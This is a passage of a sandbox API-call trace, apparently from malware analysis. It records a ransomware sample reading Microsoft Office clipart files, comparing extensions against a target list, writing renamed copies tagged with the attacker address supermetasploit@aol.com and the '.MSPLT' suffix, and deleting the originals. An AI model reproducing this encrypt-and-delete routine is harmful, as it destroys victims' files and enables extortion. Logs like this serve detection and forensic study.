(lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0306.762] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf")) returned 1 [0306.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.765] lstrlenW (lpString=".doc") returned 4 [0306.765] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0306.765] lstrlenW (lpString=".docx") returned 5 [0306.765] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0306.765] lstrlenW (lpString=".pdf") returned 4 [0306.765] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0306.765] lstrlenW (lpString=".xls") returned 4 [0306.765] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0306.765] lstrlenW (lpString=".xlsx") returned 5 [0306.765] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0306.765] lstrlenW (lpString=".ppt") returned 4 [0306.765] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0306.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.765] lstrlenW (lpString=".zip") returned 4 [0306.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0306.765] lstrlenW (lpString=".rar") returned 4 [0306.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0306.766] lstrlenW (lpString=".bz2") returned 4 [0306.766] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0306.766] lstrlenW (lpString=".7z") returned 3 [0306.766] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0306.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.766] lstrlenW (lpString=".dbf") returned 4 [0306.766] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0306.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.766] lstrlenW (lpString=".1cd") returned 4 [0306.766] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0306.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.766] lstrlenW (lpString=".jpg") returned 4 [0306.766] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0306.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.766] lstrlenW (lpString=".doc") returned 4 [0306.766] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0306.766] lstrlenW (lpString=".docx") returned 5 [0306.766] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0306.766] lstrlenW (lpString=".pdf") returned 4 [0306.766] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0306.767] lstrlenW (lpString=".xls") returned 4 [0306.767] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0306.767] lstrlenW (lpString=".xlsx") returned 5 [0306.767] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0306.767] lstrlenW (lpString=".ppt") returned 4 [0306.767] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0306.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.767] lstrlenW (lpString=".zip") returned 4 [0306.767] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0306.767] lstrlenW (lpString=".rar") returned 4 [0306.767] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0306.767] lstrlenW (lpString=".bz2") returned 4 [0306.767] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0306.767] lstrlenW (lpString=".7z") returned 3 [0306.767] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0306.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.767] lstrlenW (lpString=".dbf") returned 4 [0306.767] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0306.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.768] lstrlenW (lpString=".1cd") returned 4 [0306.768] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0306.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 68 [0306.768] lstrlenW (lpString=".jpg") returned 4 [0306.768] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0306.768] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0306.768] lstrlenW (lpString="BL00526_.WMF") returned 12 [0306.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0306.770] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=27552) returned 1 [0306.770] CloseHandle (hObject=0x528) returned 1 [0306.770] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf")) returned 0x220 [0306.770] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0306.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0306.771] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.771] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0306.772] GetLastError () returned 0x0 [0306.772] ReadFile (in: hFile=0x528, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x6ba0, lpOverlapped=0x0) returned 1 [0306.793] WriteFile (in: hFile=0x534, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x6bb0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x6bb0, lpOverlapped=0x0) returned 1 [0306.796] ReadFile (in: hFile=0x528, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0306.796] WriteFile (in: hFile=0x534, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0306.796] SetEndOfFile (hFile=0x534) returned 1 [0306.797] CloseHandle (hObject=0x534) returned 1 [0306.800] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.800] SetEndOfFile (hFile=0x528) returned 1 [0308.183] CloseHandle (hObject=0x528) returned 1 [0308.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0308.193] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf")) returned 1 [0308.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.194] lstrlenW (lpString=".doc") returned 4 [0308.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0308.194] lstrlenW (lpString=".docx") returned 5 [0308.194] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0308.195] lstrlenW (lpString=".pdf") returned 4 [0308.195] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0308.195] lstrlenW (lpString=".xls") returned 4 [0308.195] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0308.195] lstrlenW (lpString=".xlsx") returned 5 [0308.195] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0308.195] lstrlenW (lpString=".ppt") returned 4 [0308.195] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0308.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.195] lstrlenW (lpString=".zip") returned 4 [0308.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0308.195] lstrlenW (lpString=".rar") returned 4 [0308.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0308.195] lstrlenW (lpString=".bz2") returned 4 [0308.195] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0308.195] lstrlenW (lpString=".7z") returned 3 [0308.195] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0308.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.195] lstrlenW (lpString=".dbf") returned 4 [0308.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0308.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.196] lstrlenW (lpString=".1cd") returned 4 [0308.199] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0308.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.199] lstrlenW (lpString=".jpg") returned 4 [0308.199] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0308.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.199] lstrlenW (lpString=".doc") returned 4 [0308.199] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0308.199] lstrlenW (lpString=".docx") returned 5 [0308.199] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0308.199] lstrlenW (lpString=".pdf") returned 4 [0308.199] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0308.199] lstrlenW (lpString=".xls") returned 4 [0308.199] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0308.199] lstrlenW (lpString=".xlsx") returned 5 [0308.199] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0308.199] lstrlenW (lpString=".ppt") returned 4 [0308.200] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0308.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.200] lstrlenW (lpString=".zip") returned 4 [0308.200] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0308.200] lstrlenW (lpString=".rar") returned 4 [0308.200] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0308.200] lstrlenW (lpString=".bz2") returned 4 [0308.200] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0308.200] lstrlenW (lpString=".7z") returned 3 [0308.200] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0308.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.200] lstrlenW (lpString=".dbf") returned 4 [0308.200] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0308.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.200] lstrlenW (lpString=".1cd") returned 4 [0308.201] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0308.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0308.201] lstrlenW (lpString=".jpg") returned 4 [0308.201] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0308.201] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0308.201] lstrlenW (lpString="BL00985_.WMF") returned 12 [0308.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0308.202] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=3768) returned 1 [0308.202] CloseHandle (hObject=0x51c) returned 1 [0308.202] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf")) returned 0x220 [0308.202] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0308.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0308.203] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.203] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0308.204] GetLastError () returned 0x0 [0308.204] ReadFile (in: hFile=0x51c, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xeb8, lpOverlapped=0x0) returned 1 [0308.206] WriteFile (in: hFile=0x52c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec0, lpOverlapped=0x0) returned 1 [0308.208] ReadFile (in: hFile=0x51c, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0308.208] WriteFile (in: hFile=0x52c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0308.208] SetEndOfFile (hFile=0x52c) returned 1 [0308.208] CloseHandle (hObject=0x52c) returned 1 [0308.212] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.212] SetEndOfFile (hFile=0x51c) returned 1 [0309.062] CloseHandle (hObject=0x51c) returned 1 [0309.062] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0309.685] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf")) returned 1 [0309.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0309.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0309.688] lstrlenW (lpString=".doc") returned 4 [0309.688] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0309.688] lstrlenW (lpString=".docx") returned 5 [0309.688] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0309.688] lstrlenW (lpString=".pdf") returned 4 [0309.688] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0309.688] lstrlenW (lpString=".xls") returned 4 [0309.688] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0309.688] lstrlenW (lpString=".xlsx") returned 5 [0309.688] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0309.688] lstrlenW (lpString=".ppt") returned 4 [0309.688] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0309.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0309.689] lstrlenW (lpString=".zip") returned 4 [0309.689] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0309.689] lstrlenW (lpString=".rar") returned 4 [0309.689] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0309.689] lstrlenW (lpString=".bz2") returned 4 [0309.689] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0309.689] lstrlenW (lpString=".7z") returned 3 [0309.689] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0309.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0309.689] lstrlenW (lpString=".dbf") returned 4 [0309.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0309.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0309.690] lstrlenW (lpString=".1cd") returned 4 [0309.690] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0309.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0309.690] lstrlenW (lpString=".jpg") returned 4 [0309.690] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0309.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0309.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0309.691] lstrlenW (lpString=".doc") returned 4 [0309.691] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0309.691] lstrlenW (lpString=".docx") returned 5 [0309.691] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0309.691] lstrlenW (lpString=".pdf") returned 4 [0309.691] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0309.691] lstrlenW (lpString=".xls") returned 4 [0309.723] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.387] lstrlenW (lpString=".xlsx") returned 5 [0310.387] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.388] lstrlenW (lpString=".ppt") returned 4 [0310.388] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0310.388] lstrlenW (lpString=".zip") returned 4 [0310.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.388] lstrlenW (lpString=".rar") returned 4 [0310.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.388] lstrlenW (lpString=".bz2") returned 4 [0310.388] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.388] lstrlenW (lpString=".7z") returned 3 [0310.388] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0310.388] lstrlenW (lpString=".dbf") returned 4 [0310.388] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0310.388] lstrlenW (lpString=".1cd") returned 4 [0310.388] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 68 [0310.388] lstrlenW (lpString=".jpg") returned 4 [0310.388] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.388] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0310.389] lstrlenW (lpString="BS00078_.WMF") returned 12 [0310.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.620] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=1444) returned 1 [0310.620] CloseHandle (hObject=0x524) returned 1 [0310.620] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf")) returned 0x220 [0310.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.622] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.622] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0310.623] GetLastError () returned 0x0 [0310.623] ReadFile (in: hFile=0x524, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x5a4, lpOverlapped=0x0) returned 1 [0310.635] WriteFile (in: hFile=0x530, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x5b0, lpOverlapped=0x0) returned 1 [0310.637] ReadFile (in: hFile=0x524, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0310.637] WriteFile (in: hFile=0x530, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0310.637] SetEndOfFile (hFile=0x530) returned 1 [0310.637] CloseHandle (hObject=0x530) returned 1 [0310.638] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.639] SetEndOfFile (hFile=0x524) returned 1 [0310.642] CloseHandle (hObject=0x524) returned 1 [0310.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0310.644] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: 